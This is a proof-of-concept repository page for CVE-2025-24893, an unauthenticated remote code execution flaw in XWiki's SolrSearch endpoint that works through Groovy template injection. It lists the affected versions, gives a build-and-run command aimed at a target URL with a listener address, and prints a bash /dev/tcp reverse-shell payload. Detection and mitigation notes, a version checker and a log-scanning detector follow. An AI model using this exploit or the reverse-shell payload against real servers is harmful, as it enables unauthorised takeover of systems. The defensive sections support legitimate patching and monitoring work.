
CVE-2025-24893 PoC — XWiki Platform Security Vulnerability

Associated Vulnerability
Title: XWiki Platform Security Vulnerability (CVE-2025-24893)
Description: XWiki Platform is XWiki's open-source wiki platform for building collaborative web applications. XWiki Platform contains a security vulnerability: any guest user can trigger remote code execution through a request to SolrSearch.
Description
Proof-of-Concept exploit for CVE-2025-24893, an unauthenticated Remote Code Execution (RCE) vulnerability in XWiki. Exploits a template injection flaw in the SolrSearch endpoint via Groovy script execution.
Readme
# CVE-2025-24893 — XWiki Unauthenticated RCE (PoC)

Proof-of-Concept exploit for **CVE-2025-24893**, a critical unauthenticated **Remote Code Execution** vulnerability in **XWiki**.  
This exploit abuses a Groovy template injection in the `SolrSearch` endpoint to execute arbitrary commands — including reverse shells — without authentication.

## 💥 Vulnerability Details

A flaw in how XWiki handles crafted input to the `SolrSearch` RSS endpoint allows attackers to inject Groovy code into the rendering pipeline.  
This enables **unauthenticated RCE** via `{{groovy}}` script blocks.

### ✅ Affected Versions

- `< 15.10.11`
- `>= 16.0.0` and `< 16.4.1`

### ❌ Fixed in

- `15.10.11`
- `16.4.1`
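As an added illustration (not code from the PoC repository), the Python check below classifies an XWiki version string against the two affected ranges listed above. Pre-release suffixes such as `-rc-1` are assumed to sort before the bare release, so a release candidate of a fixed version is still reported as affected; that ordering is an assumption of this example, not something the README states.

```python
import re
from typing import Tuple

VersionKey = Tuple[Tuple[int, ...], int]

# Boundaries taken from the README: fixed in 15.10.11 and 16.4.1,
# and the 16.x branch is affected from 16.0.0 up to (not including) 16.4.1.
FIXED_15: VersionKey = ((15, 10, 11), 1)
FIXED_16: VersionKey = ((16, 4, 1), 1)
BRANCH_16: VersionKey = ((16, 0, 0), 0)

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(.*)$")


def version_key(version: str) -> VersionKey:
    """Turn '16.4.1-rc-1' into a sortable key: ((16, 4, 1), 0).

    The trailing flag is 0 for a pre-release suffix and 1 for a bare release,
    so a pre-release sorts below the release it precedes (assumption).
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unparseable XWiki version: {version!r}")
    parts = tuple(int(p) for p in m.group(1).split("."))
    if len(parts) < 3:
        parts = parts + (0,) * (3 - len(parts))  # 15.10 == 15.10.0
    flag = 0 if m.group(2) else 1
    return (parts, flag)


def is_affected(version: str) -> bool:
    """True if the version falls in '< 15.10.11' or '>= 16.0.0 and < 16.4.1'."""
    key = version_key(version)
    return key < FIXED_15 or (BRANCH_16 <= key < FIXED_16)


if __name__ == "__main__":
    for v in ("14.10.2", "15.10.10", "15.10.11", "16.0.0", "16.4.0", "16.4.1", "16.4.1-rc-1", "16.5.0"):
        print(f"{v:>12}: {'AFFECTED' if is_affected(v) else 'not affected'}")
```

The version string is normally visible in the page footer or the `/xwiki/rest` API of an instance you administer; the check only compares numbers and sends no traffic.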

---

## 🔧 Usage

Download the release:

[Releases](https://github.com/investigato/cve-2025-24893-poc/releases/tag/v0.1.0)

or build from source:

```bash
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
```

### Reverse Shell Payload

There's a prebuilt reverse shell payload of this form:

`bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1`

---

## ⚠️ Legal Disclaimer

This code is for **educational and authorized security research only**.
Do **not** use this exploit against systems you do not own or have explicit permission to test.

---

## ✍️ Credits

- Exploit PoC by [Artemir7](https://github.com/Artemir7/CVE-2025-24893-EXP)
- Rust port by investigato

---

## 🛡️ Detection & Mitigation

- Update to **XWiki 15.10.11** or **16.4.1+**
- Monitor suspicious use of `/bin/get/Main/SolrSearch?media=rss`
- Disable Groovy execution for anonymous users if possible
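To make the monitoring recommendation above concrete, here is an added example (not from the PoC or from XWiki) that scans web-server access-log lines for requests to the `SolrSearch` endpoint and raises a high-severity finding when the URL-decoded query string contains the `{{groovy}}` macro delimiters the README describes; plain `media=rss` requests are reported at low severity for review, since legitimate feed readers use that URL too. The log lines, client addresses and the `q` query parameter are constructed for the example, and the NCSA combined log format is an assumption about what the reverse proxy in front of XWiki writes.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Assumption: the reverse proxy / servlet container in front of XWiki writes
# NCSA combined log format (client ident user [timestamp] "request" status size ...).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SOLR_PATH = "/bin/get/Main/SolrSearch"   # endpoint named in the README
MARKERS = ("{{groovy", "{{/groovy")       # macro delimiters the README describes


@dataclass
class Finding:
    client: str
    timestamp: str
    target: str
    severity: str
    reason: str


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded input (%257B -> %7B -> {) is caught."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target: str) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a request target, or None if it is not of interest."""
    parts = urlsplit(target)
    if SOLR_PATH not in fully_decode(parts.path):
        return None
    if any(marker in fully_decode(parts.query).lower() for marker in MARKERS):
        return ("high", "Groovy macro delimiters in SolrSearch query string")
    if "rss" in parse_qs(parts.query).get("media", []):
        return ("low", "SolrSearch RSS feed request; confirm it is expected traffic")
    return None


def scan_access_log(lines: Iterable[str]) -> List[Finding]:
    findings: List[Finding] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we can parse; skip rather than guess
        verdict = classify_request(m.group("target"))
        if verdict:
            findings.append(Finding(m.group("client"), m.group("ts"), m.group("target"), *verdict))
    return findings


# Constructed sample log lines (addresses are from documentation ranges, not real hosts).
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Mar/2025:12:00:01 +0000] "GET /bin/view/Main/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [10/Mar/2025:12:00:05 +0000] "GET /bin/get/Main/SolrSearch?media=rss&q=release+notes HTTP/1.1" 200 4821 "-" "FeedReader/2.1"',
    '203.0.113.7 - - [10/Mar/2025:12:01:17 +0000] "GET /bin/get/Main/SolrSearch?media=rss&q=%7B%7Bgroovy%7D%7DREDACTED%7B%7B%2Fgroovy%7D%7D HTTP/1.1" 200 1337 "-" "python-requests/2.32"',
    '203.0.113.7 - - [10/Mar/2025:12:01:18 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&q=%257B%257Bgroovy%257D%257D HTTP/1.1" 200 1337 "-" "python-requests/2.32"',
    "garbage line that is not an access-log entry",
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"[{f.severity}] {f.timestamp} {f.client} {f.reason}")
```

Because the query string is decoded in full rather than parsed parameter by parameter, the rule does not depend on which parameter carries the macro, and the repeated decoding catches the common double-encoding evasion; a production deployment would feed real proxy logs into `scan_access_log` and forward `high` findings to the SIEM.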
File Snapshot

```
[4.0K] /data/pocs/ccf20b542b2e509842383ed9ab6a681e8b9a474f
├── [ 45K] Cargo.lock
├── [ 424] Cargo.toml
├── [1.6K] README.md
└── [4.0K] src
    └── [3.9K] main.rs

1 directory, 4 files
```